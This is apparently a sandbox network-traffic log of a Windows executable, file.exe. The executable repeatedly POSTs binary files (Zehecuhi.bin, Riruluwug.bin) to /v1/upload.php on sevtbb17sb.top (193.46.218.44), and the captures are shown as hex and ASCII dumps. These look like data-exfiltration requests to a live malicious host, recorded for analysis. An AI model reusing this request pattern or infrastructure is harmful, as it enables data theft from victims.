Oct 20, 2024 22:47:40.742552996 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:40.742571115 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49764	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:42.055490971 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:42.055500984 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49765	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:43.383141041 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:43.383177042 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49766	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:45.601967096 CEST	333	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary69382044 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 412 Host: sevtbb17sb.top
Oct 20, 2024 22:47:45.602000952 CEST	412	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 36 39 33 38 32 30 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5a 65 68 Data Ascii: ------Boundary69382044Content-Disposition: form-data; name="file"; filename="Zehecuhi.bin"Content-Type: application/octet-streamfV^v50AB#QQ{Wb7-6g:v#-u_FJ0r-w{jz^rXC]G
Oct 20, 2024 22:47:46.820302010 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Sun, 20 Oct 2024 20:47:46 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49767	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:48.133344889 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:48.133404016 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:48.138339043 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:48.138593912 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:48.138619900 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:48.138642073 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:48.138717890 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:48.138730049 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:48.138847113 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:48.138971090 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:48.138999939 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49768	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:49.727221966 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:49.727309942 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:49.732378960 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:49.732494116 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:49.732527971 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:49.732553005 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:49.732620955 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:49.732655048 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:49.732711077 CEST	4944	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:49.732743979 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC
Oct 20, 2024 22:47:49.737287998 CEST	2472	OUT	Data Raw: 8c 02 0a fd 61 e7 a0 94 c1 ff 55 d7 73 d9 21 a4 96 91 5c 95 41 5b 56 ab 3e 8e 70 75 04 af e8 35 2b 97 fa 13 ce 5a e9 58 76 d4 28 a7 2d 00 9a df 1b 4e 3a 49 0e c0 98 43 83 ee d1 c3 de 00 fe 61 7b 95 c8 4c 35 23 8f f8 20 47 4a fd 44 eb ff 0d 3c c3 Data Ascii: aUs!\A[V>pu5+ZXv(-N:ICa{L5# GJD<{p$XnNkPeDE;=r'<BA\5axhuH, 3X":{Cl\V5o)f@zr[E^iNtEI4%>7* DX\pkM:MO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49769	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:51.353699923 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:51.353765011 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:51.359056950 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
Oct 20, 2024 22:47:51.359164953 CEST	2472	OUT	Data Raw: b5 7e f0 dc 69 f7 83 2e 7d 3f 41 6d 36 ae 7c 0f 4a da 15 47 4c 4b b9 81 41 49 7d 61 10 f9 2a 46 a8 88 5f 95 c3 83 3a b7 a2 5a bb a8 bb c2 2a 28 34 06 6c 89 5d b7 d6 13 ba 88 49 06 88 39 97 34 99 eb 44 3f cb 9c 59 42 42 56 da a4 2f bf be 7f 3f 4b Data Ascii: ~i.}?Am6\|JGLKAI}aF_:Z(4l]I94D?YBBV/?KnHs&&}/2x/0&5LX3I_>"oBgQ2Q^ ;K7~!~4l?s+v0B61u[{C!{"nND
Oct 20, 2024 22:47:51.359352112 CEST	2472	OUT	Data Raw: 2a 38 49 81 dd 77 f2 93 98 f4 01 c9 56 a4 9d ae 0a 7a 82 98 d5 2f 63 d8 27 5a f5 2d 1b 25 30 37 d5 17 ed b2 bb 5b f1 cb 7b 33 3d 64 ec c4 2a 65 26 84 a6 73 e7 3a 0d 2c c4 03 7e 7c 9d 7b ee e3 1d e2 f2 78 3c 89 d6 16 65 b1 5c da 42 46 35 e2 17 b9 Data Ascii: 8IwVz/c'Z-%07[{3=de&s:,~\|{x<e\BF5gZ:Oy*M\|>tn>yC\'M]]}k9%j_7~hTla(A"fz_}uQ+Y;c5(
Oct 20, 2024 22:47:51.359364986 CEST	2472	OUT	Data Raw: f1 1e 4f f1 2b 9e 66 27 bb 51 d2 34 ea 2d 7f 71 e2 08 3c c5 35 31 73 90 d8 b8 43 34 b9 d4 b9 01 4d 82 8e 5d bc 98 60 27 93 08 85 33 55 7e 10 2d 3e e6 56 39 8e 08 58 ef f8 e7 4e a5 63 ed 41 5c 78 94 a0 9f 76 17 03 f3 06 12 99 a1 a5 33 aa e9 0b 04 Data Ascii: O+f'Q4-q<51sC4M]`'3U~->V9XNcA\xv3S)9C(>K8KUcj);b/M8D`2B->#"+PJ3PKDB{ihx 0W7%2Nc\|W3Fqrv_$
Oct 20, 2024 22:47:51.359411955 CEST	2472	OUT	Data Raw: 28 af 7f 97 ea a4 b2 2c 33 32 41 70 1b 0b d0 a2 13 3d 42 9a c2 db aa d9 9c 4b 41 3f 5a 27 45 cf 99 25 5d 8a 77 94 37 93 d7 a3 24 89 63 85 27 77 c6 52 a4 9a 2b b6 81 85 9b 34 b3 be e9 0a 2f ee 7e 24 4b d3 9e c9 b5 e3 8e 95 65 21 c1 30 6b b0 cb 17 Data Ascii: (,32Ap=BKA?Z'E%]w7$c'wR+4/~$Ke!0k.Vde0+3H6B'A)U:~RA~"\p!J_"VUE&]`j2oWoS%1y^KK}AX:_\K1?G;@Y0_7]jN
Oct 20, 2024 22:47:51.359484911 CEST	2472	OUT	Data Raw: da 49 88 df e2 84 31 94 7b 0e 89 73 81 94 75 6a f7 59 05 f6 f0 3c 80 7a f4 2f bb 54 0f 64 59 b2 4f a8 aa a9 e4 45 d5 91 76 db 73 4a 89 90 d0 3b b9 0a 7e d1 5c 01 8c c6 e0 0b e9 80 e9 f8 27 7b 6e 51 ce 7f da 26 be c8 4a 7a 4d 30 6c 7e 5b b6 bf 92 Data Ascii: I1{sujY<z/TdYOEvsJ;~\'{nQ&JzM0l~[Jz<U!%j;yRANq9S$jK#a''7SkcV&9jxqWvBlEw=N-,mj@W8Ot1-+-OHHieIh"O]YJ+3
Oct 20, 2024 22:47:51.359561920 CEST	2472	OUT	Data Raw: 98 6e a0 4f d7 74 dc df 1b b2 d9 f8 4a d0 e3 5a eb eb ab d5 76 f6 e6 76 05 57 9f 28 6c 01 9a 0c 6d 74 57 30 78 10 e6 7a 4d 82 dd 0b ae b6 84 3b ab 74 2d c4 1e c2 9d 25 9f 84 1f 6b bd 58 47 77 0a 2d d0 e9 0f d7 3a 75 97 fd e7 ec 1b 55 83 52 5c 3d Data Ascii: nOtJZvvW(lmtW0xzM;t-%kXGw-:uUR\=m+MTu$bV_lU>,Gs0?)M3zb`2"dFe9JbU/R$BL$t>j>fP\4y8Eh^g<5mt7,W:
Oct 20, 2024 22:47:51.359572887 CEST	2472	OUT	Data Raw: 81 e3 0e 25 03 5a 42 e0 08 cd e1 bc 1f ca bf bc 31 3d a4 3b e6 c7 cd 15 11 49 98 6c be f3 e3 0d 01 98 14 32 21 00 63 84 02 44 f9 19 72 c2 85 f8 ce 7c 3f c4 0c 33 82 9b 96 a9 cc 06 73 9d bb 51 76 47 82 95 dd 1e 60 87 12 de d3 cf 3b eb f2 ee 73 02 Data Ascii: %ZB1=;Il2!cDr\|?3sQvG`;s1cw#/GT^>l.5S@Q[R(}-xMHg0P6/'<k\|Z(YbhC%ZHy#pb$hi `1C;.Jzv_u7
Oct 20, 2024 22:47:51.359606981 CEST	2472	OUT	Data Raw: 1f ae c3 aa e1 19 31 fc 46 51 61 52 7e 4e 08 72 e4 04 c6 eb a7 6a 89 32 45 48 64 7e 38 ed 7a 61 a2 b3 ea 6d 2e b6 28 49 6a e2 88 67 e4 9a 29 ad a8 f6 2c e1 10 37 c6 f5 4d 58 ed 2e cd 41 f3 3c 29 6b 41 c2 a2 e9 1b 46 b7 f5 62 c7 fc 06 d8 42 34 76 Data Ascii: 1FQaR~Nrj2EHd~8zam.(Ijg),7MX.A<)kAFbB4v"=I~agE}MD/@88-\CjuVwAw;Ra:wEFqEzx6<h+,(,ClN\|eZJo'bC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49770	193.46.218.44	80	6356	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 22:47:52.978470087 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary35492427 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 62873 Host: sevtbb17sb.top
Oct 20, 2024 22:47:52.978553057 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 33 35 34 39 32 34 32 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 72 Data Ascii: ------Boundary35492427Content-Disposition: form-data; name="file"; filename="Riruluwug.bin"Content-Type: application/octet-streamh/!Oz2<7\Onx)J^}^3[`"?{)p//mA%m`gf3@\|W`kG?trZl,*b.S
Oct 20, 2024 22:47:52.983463049 CEST	1236	OUT	Data Raw: 99 a4 bb ee 9f ea c2 86 7d 3c c4 e6 fb 6c 82 1a 51 77 ed 7c f7 a0 da ac 2c 76 4d 08 b0 02 37 43 c3 a7 68 76 c7 a4 3c 0e 7d 77 79 13 ca 6a c8 1c 65 e2 a5 fe b5 38 ec d0 c6 13 87 af a4 58 0a 11 49 0a f3 e4 34 84 47 73 31 4f 9a 11 5c 5b 1c fd 35 c6 Data Ascii: }<lQw\|,vM7Chv<}wyje8XI4Gs1O\[5U"%^ZpP1W"spHn-'m"uYM^^I/ee{L)Ivqy`Xopdf~=dtusnQm]-U6X*BR
